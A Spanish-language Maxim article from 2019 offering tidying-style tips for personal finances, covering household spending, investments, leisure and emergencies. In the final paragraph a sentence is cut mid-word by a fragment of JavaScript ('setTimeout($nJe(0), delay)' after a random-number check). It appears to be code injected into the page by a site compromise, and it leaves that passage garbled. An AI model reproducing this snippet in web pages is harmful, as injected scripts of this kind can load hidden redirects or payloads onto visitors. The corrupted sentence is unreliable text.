Cómo poner en orden tus finanzas

    Cómo poner en orden tus finanzas

    Sigue estas recomendaciones y ordena tus finanzas.

    Autor: Redacción Maxim 22 abril, 2019


    FOTO: GettyImages

    Ordena tus finanzas.

     

    Logra un equilibrio económico y pon tus finanzas en orden. Afluenta nos da unos consejos prácticos basados en el método de Marie Kondo para organizar tu dinero en estas categorías.

     

    Gastos del hogar

    Mantener orden y armonía en el hogar es más necesario de lo que mucha gente piensa. Dedica tiempo todos los días para anotar cada uno de los gastos que realices, lo puedes hacer en categorías para facilitarlo. Por ejemplo: supermercado, gastos fijos (luz, agua, gas, internet), así a fin de mes puedas analizar todos los resultados y optimizar los gastos.

     

    Inversiones

    Invertir no es para los más expertos, es para aquellos que buscan incrementar su dinero. Invertir te permite ahorrar a mediano o largo plazo para tus proyectos e incluso para tu retiro e incrementar tus finanzas. 

     

    Gastos de entretenimiento

    Esta categoría en tu planeación financiera es tan relevante como las anteriores. Todos necesitamos tiempos de ocio que nos ayuden a relajarnos y disfrutar buenos momentos con nuestros seres queridos. Empieza por poner en orden las finanzas, debes tener claro hacia dónde va cada peso que ganas, analiza el destino de la fuga de recursos para que puedas ordenar tus prioridades y conviertas el dinero en un bien duradero.  

     

    Imprevistos

    Nunca sabes cuándo una emergencia o accidente puede llegar, te recomendamos que mantengas algo de tus ahorros listos para cualquier eventualidad. La clave es identificar las fuentes de “imprevistos”. Se recomienda identificar los rubros en los que se sueles gastar y listar aquellos que se pueden recortar o prescindir, te sorprenderá cuánto puedes ahorrar si recortar esos gastos innecesarios.

     

    No significa que debes recortar cada uno de los gustitos que te das de vez en cuandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando o aquello que disfrutas hacer, sólo es cuestión de crear conciencia, muchas veces los gastos cotidianos excesivos son los que no te dejan ahorrar.

     

    No dejes que lleguen las quincenas y te quedes en ceros en un segundo.

     

     

    Quieres poner en orden tu casa, estas son algunas tendencias de diseño que puedes aplicar.

     

     

    Temas relacionados con esta nota: , , , ,

Sigue estas recomendaciones y ordena tus finanzas.